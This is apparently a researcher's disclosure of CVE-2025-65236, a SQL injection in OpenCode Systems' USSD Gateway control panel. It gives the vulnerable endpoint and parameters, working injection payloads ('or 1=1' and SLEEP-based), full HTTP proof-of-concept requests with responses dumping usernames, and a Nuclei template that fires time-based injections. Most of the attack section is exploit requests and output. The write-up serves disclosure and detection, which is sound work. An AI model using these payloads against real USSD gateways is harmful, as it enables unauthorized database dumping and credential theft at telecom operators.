[CVE-2025-65236] USSD Gateway SQL Injection - Sessions

Technical information about the CVE-2025-65236 in OpenCode USSD GW application.

Description

SQL Injection in the USSD Gateway application offered by OpenCode Systems allows the user who has an access to the vulnerable function to dump the database by injecting SQL commands.

Application Details

Name: USSD Gateway
Vendor: OpenCode Systems
Version: OC Release 5 - Version 6.13.11

Technical Details

Vulnerable Endpoint: /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t
Vulnerable Parameters: flt_sessid and flt_user
Payload Sample: flt_sessid=1; SELECT SLEEP(5)#

Exploitation

The default request is being used to get the username of the account details based on the account ID, the response is shown below

POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2
Host: hostname
Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_csrf=K6[...]iB0qQ%3D%3D&display=1&=00000002&=&flt_server_node=VSSTEST01AOCFRV

HTTP/2 200 OK
[...]


[...]
<td align=left>00000002</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>   
</TD>
</TR>
</TABLE>
[...]

By appending the payload to the parameter, all the usernames will be shown in the response.

You can use different payloads, the below one was used as a POC

POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2
Host: hostname
Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_csrf=K6[...]iB0qQ&display=1&flt_sessid=00000002'+or+1=1--+-&flt_user=&flt_server_node=VSSTEST01AOCFRV

HTTP/2 200 OK
[...]

<td align=left>00000002</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>  
<td align=left>00000003</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr> 
<td align=left>00000004</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>  
<td align=left>00000005</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>  
<td align=left>00000006</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
[...]
</TD>
</TR>
</TABLE>
[...]

Nuclei Template

You can use this template for easy detection.

Adjust the CSRF if required

id: ocussdgw-list_sessions-sqli-time

info:
  name: USSD Gateway OCP Control Panel SQL Injection
  author: Eslam Ali Akl @eslam3kl
  severity: high
  description: |
    Time-based SQL injection test for the list_sessions_t endpoint.
    Injects a SLEEP(5) payload into the `flt_sessid` and `flt_user` parameters and flags the
    target if the response time indicates the SQL sleep was executed.
    Adjust `_csrf`, cookies or headers if authentication is required.
  tags: [sqli, time-based, ocpanel, ocussdgw]

requests:
  - id: time_inject_flt_sessid
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002'; SELECT SLEEP(5)#&flt_user=&flt_server_node=VSSTEST01AOCFRV"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"

  - id: time_inject_flt_user
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002&flt_user=admin'; SELECT SLEEP(5)#&flt_server_node=VSSTEST01AOCFRV"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"

Previous[CVE-2025-65235] USSD GW SQL Injection - SubUsers Next[CVE-2025-65239] USSD Gateway Broken Access Control - Logs

Last updated 25 days ago